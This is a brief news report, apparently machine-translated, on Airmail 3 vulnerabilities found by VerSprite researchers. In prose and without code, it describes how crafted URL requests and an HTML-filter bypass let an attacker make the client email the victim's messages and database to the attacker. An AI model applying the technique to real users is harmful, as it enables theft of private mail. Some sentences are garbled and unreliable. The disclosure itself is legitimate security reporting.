The dangerous vulnerability in the software 3 Airmail, an alternative email client for macOS, allow a remote attacker to steal emails and attachments of users.
Researchers from VerSprite found that the URL requests are processed Airmail 3, can be used to steal files from the victim. An attacker can send e-mail to Airmail 3 user containing a link with a URL query which runs the function “send mail” application. When the attacker sends a new email account of the victim. In the link you can incorporate elements that will make Airmail 3 to attach files to an outgoing message, e.g. previously sent emails.
The researchers also were able to bypass HTML filters Airmail to immediately start the exploit. If the victim clicks on the malicious viewing messages in Airmail 3, the exploit runs, and the database containing the email of the victim is automatically sent to the attacker.
According to experts, there are four different vulnerabilities that can implement the attack scenario.